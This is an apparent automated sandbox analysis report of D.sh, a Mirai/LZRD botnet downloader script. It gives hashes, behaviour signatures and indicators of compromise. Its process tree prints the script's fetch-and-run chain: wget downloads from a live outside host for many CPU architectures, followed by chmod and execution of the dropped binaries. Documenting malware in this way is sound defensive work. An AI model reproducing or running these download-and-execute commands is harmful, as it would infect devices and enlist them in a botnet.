Analysis
- max time kernel: 23s
- max time network: 31s
- platform: linux_mips
- resource: debian9-mipsbe-en-20211208
- resource tags: arch:mips, image:debian9-mipsbe-en-20211208, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mips, system
- submitted: 30-04-2023 13:01

Static task: static1

Behavioral task: behavioral1
- Sample: D.sh
- Resource: ubuntu1804-amd64-en-20211208

Behavioral task: behavioral2
- Sample: D.sh
- Resource: debian9-armhf-20221111-en

Behavioral task: behavioral3
- Sample: D.sh
- Resource: debian9-mipsbe-en-20211208
General
- Target: D.sh
- Size: 1KB
- MD5: e41b9523a8373b79498bef2473723adf
- SHA1: bd468f9718ef86d34c88552dd01464f85e8e2ee5
- SHA256: 27304700dc53d71505aa6d32165fe6142f3e6173effcd08a84255a3eae40788e
- SHA512: 0b933fcf0f8a24ffd62431f47469529fce2170307777a632d74af893902af3ba60a14076a74874354c7667b39e5ebf37a2f6f1e9d145599d22c2fbbb03f31476

Malware Config
- Extracted: mirai, LZRD
Signatures
-
Modifies the Watchdog daemon (1 TTPs)
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
-
Writes file to system bin folder (1 TTPs, 2 IoCs)
Processes:
description                  | ioc
File opened for modification | /sbin/watchdog
File opened for modification | /bin/watchdog
-
Executes dropped EXE (9 IoCs)
Processes:
pid | process
332 | wget
338 | cat
346 | cat
352 | chmod
358 | BT
364 | wget
370 | cat
376 |
382 |
-
Processes:
resource    | yara_rule
/tmp/x86    | upx
/tmp/BT     | upx
/tmp/mips   | upx
/tmp/BT     | upx
/tmp/x86_64 | upx
/tmp/BT     | upx
/tmp/mpsl   | upx
/tmp/BT     | upx
/tmp/arm    | upx
/tmp/BT     | upx
/tmp/arm5   | upx
/tmp/BT     | upx
/tmp/arm6   | upx
/tmp/BT     | upx
/tmp/arm7   | upx
/tmp/BT     | upx
/tmp/ppc    | upx
/tmp/BT     | upx
-
Writes file to tmp directory (10 IoCs)
Malware often drops required files in the /tmp directory.
Processes:
description                  | ioc         | process
File opened for modification | /tmp/mpsl   | wget
File opened for modification | /tmp/arm    | wget
File opened for modification | /tmp/arm7   | wget
File opened for modification | /tmp/ppc    | wget
File opened for modification | /tmp/x86    | wget
File opened for modification | /tmp/BT     |
File opened for modification | /tmp/x86_64 | wget
File opened for modification | /tmp/mips   | wget
File opened for modification | /tmp/arm5   | wget
File opened for modification | /tmp/arm6   | wget
Processes
/tmp/D.sh
  wget http://ping.999apk.top/x86
    - Writes file to tmp directory
  cat x86
  chmod +x BT D.sh systemd-private-e8b2f740dd804249ad4a663ceaf68289-systemd-timedated.service-VIvTww systemd-private-e8b2f740dd804249ad4a663ceaf68289-systemd-timesyncd.service-jrwKA5 x86
  ./BT
  wget http://ping.999apk.top/mips
    - Executes dropped EXE
    - Writes file to tmp directory
  cat mips
  chmod +x BT D.sh mips systemd-private-e8b2f740dd804249ad4a663ceaf68289-systemd-timedated.service-VIvTww systemd-private-e8b2f740dd804249ad4a663ceaf68289-systemd-timesyncd.service-jrwKA5 x86
  ./BT
  wget http://ping.999apk.top/arc
  cat arc
    - Executes dropped EXE
  chmod +x BT D.sh mips systemd-private-e8b2f740dd804249ad4a663ceaf68289-systemd-timedated.service-VIvTww systemd-private-e8b2f740dd804249ad4a663ceaf68289-systemd-timesyncd.service-jrwKA5 x86
  ./BT
  wget http://ping.999apk.top/x86_64
    - Writes file to tmp directory
  cat x86_64
  chmod +x BT D.sh mips systemd-private-e8b2f740dd804249ad4a663ceaf68289-systemd-timedated.service-VIvTww systemd-private-e8b2f740dd804249ad4a663ceaf68289-systemd-timesyncd.service-jrwKA5 x86 x86_64
  ./BT
  wget http://ping.999apk.top/mpsl
    - Writes file to tmp directory
  cat mpsl
    - Executes dropped EXE
  chmod +x BT D.sh mips mpsl systemd-private-e8b2f740dd804249ad4a663ceaf68289-systemd-timedated.service-VIvTww systemd-private-e8b2f740dd804249ad4a663ceaf68289-systemd-timesyncd.service-jrwKA5 x86 x86_64
  ./BT
  wget http://ping.999apk.top/arm
    - Writes file to tmp directory
  cat arm
  chmod +x arm BT D.sh mips mpsl systemd-private-e8b2f740dd804249ad4a663ceaf68289-systemd-timedated.service-VIvTww systemd-private-e8b2f740dd804249ad4a663ceaf68289-systemd-timesyncd.service-jrwKA5 x86 x86_64
    - Executes dropped EXE
  ./BT
  wget http://ping.999apk.top/arm5
    - Writes file to tmp directory
  cat arm5
  chmod +x arm arm5 BT D.sh mips mpsl systemd-private-e8b2f740dd804249ad4a663ceaf68289-systemd-timedated.service-VIvTww systemd-private-e8b2f740dd804249ad4a663ceaf68289-systemd-timesyncd.service-jrwKA5 x86 x86_64
  ./BT
    - Executes dropped EXE
  wget http://ping.999apk.top/arm6
    - Writes file to tmp directory
  cat arm6
  chmod +x arm arm5 arm6 BT D.sh mips mpsl systemd-private-e8b2f740dd804249ad4a663ceaf68289-systemd-timedated.service-VIvTww systemd-private-e8b2f740dd804249ad4a663ceaf68289-systemd-timesyncd.service-jrwKA5 x86 x86_64
  ./BT
  wget http://ping.999apk.top/arm7
    - Executes dropped EXE
    - Writes file to tmp directory
  cat arm7
  chmod +x arm arm5 arm6 arm7 BT D.sh mips mpsl systemd-private-e8b2f740dd804249ad4a663ceaf68289-systemd-timedated.service-VIvTww systemd-private-e8b2f740dd804249ad4a663ceaf68289-systemd-timesyncd.service-jrwKA5 x86 x86_64
  ./BT
  wget http://ping.999apk.top/ppc
    - Writes file to tmp directory
  cat ppc
    - Executes dropped EXE
  chmod +x arm arm5 arm6 arm7 BT D.sh mips mpsl ppc systemd-private-e8b2f740dd804249ad4a663ceaf68289-systemd-timedated.service-VIvTww systemd-private-e8b2f740dd804249ad4a663ceaf68289-systemd-timesyncd.service-jrwKA5 x86 x86_64
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads